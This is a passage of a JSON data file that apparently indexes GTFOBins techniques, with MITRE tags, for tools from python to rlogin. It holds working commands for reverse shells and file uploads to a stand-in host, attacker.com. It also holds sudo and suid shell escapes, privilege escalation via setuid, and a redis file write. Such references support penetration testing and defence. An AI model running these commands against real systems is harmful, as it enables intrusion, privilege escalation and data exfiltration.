sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:reverse-shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:0:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:0:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:1:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:1:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:1:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:qpdf:file-read:0:sudo","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/qpdf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:qpdf:file-read:0:suid","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/qpdf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:qpdf:file-read:0:unprivileged","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/qpdf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:file-read:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:file-read:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:inherit:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:inherit:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ranger:shell:0:sudo","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ranger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ranger:shell:0:unprivileged","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ranger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rc:shell:0:sudo","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rc:shell:0:suid","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rc:shell:0:unprivileged","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:readelf:file-read:0:sudo","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/readelf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:readelf:file-read:0:suid","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/readelf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:readelf:file-read:0:unprivileged","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/readelf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redcarpet:file-read:0:sudo","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redcarpet:file-read:0:unprivileged","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redis:file-write:0:sudo","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redis/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redis:file-write:0:suid","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/redis/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redis:file-write:0:unprivileged","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redis/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:upload:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:upload:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:upload:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rev:file-read:0:sudo","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rev/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rev:file-read:0:suid","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rev/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rev:file-read:0:unprivileged","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rev/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlogin:upload:0:sudo","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlogin/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlogin:upload:0:suid","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious 